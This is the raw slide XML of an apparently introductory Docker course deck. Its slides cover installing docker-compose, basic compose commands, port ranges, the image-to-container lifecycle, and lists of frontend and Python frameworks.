                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    ports:</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      - "8080:80"</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    volumes:</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      - .:/var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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206"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1943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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install docker compose</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="Google Shape;1294;p206"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="767050"/>
            <a:ext cx="8520600" cy="3654300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt update</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo curl -L "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o /usr/local/bin/docker-compose</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo chmod +x /usr/local/bin/docker-compose</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose --version</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose up -d --build (Pull + Create + Start )</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose ps -a (To check container status)</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker-compose down (stop + remove)</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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207"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="1191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3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server/System Port</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3534">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p207"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729900" y="1840275"/>
            <a:ext cx="8414100" cy="18570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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0(min) - 65535(max)</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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08"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="1191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3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run is a combination of 3 commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3534">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p208"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729900" y="1840275"/>
            <a:ext cx="8414100" cy="1857000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image pull</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container create</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container start</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run = docker pull + docker create + docker start</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFil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09"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79950" y="1423525"/>
            <a:ext cx="8982000" cy="18375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b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Registry → image → container-&gt; start -&gt; Running Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Running Container </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>→ Stop Container → Create Image -&gt; Registry</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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210"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2621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Frontend Apps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1317" name="Google Shape;1317;p210"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223500" y="1150750"/>
            <a:ext cx="8697000" cy="3621900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>NextJs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3320">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( Fullstack Framework of ReactJs )</a:t>
            </a:r>
            <a:endParaRPr sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ReactJs</a:t>
            </a:r>
            <a:endParaRPr sz="3320" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>VueJs</a:t>
            </a:r>
            <a:endParaRPr sz="3320" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>AngularJs</a:t>
            </a:r>
            <a:endParaRPr sz="3320" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>NuxtJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3320">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( Fullstack Framework of VueJs )</a:t>
            </a:r>
            <a:endParaRPr sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="52895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Python</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Apps</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Google Shape;1323;p211"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1935750"/>
            <a:ext cx="8832300" cy="2923800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-439419" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="3320"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3320" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3320">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( Fullstack Framework of Python)</a:t>
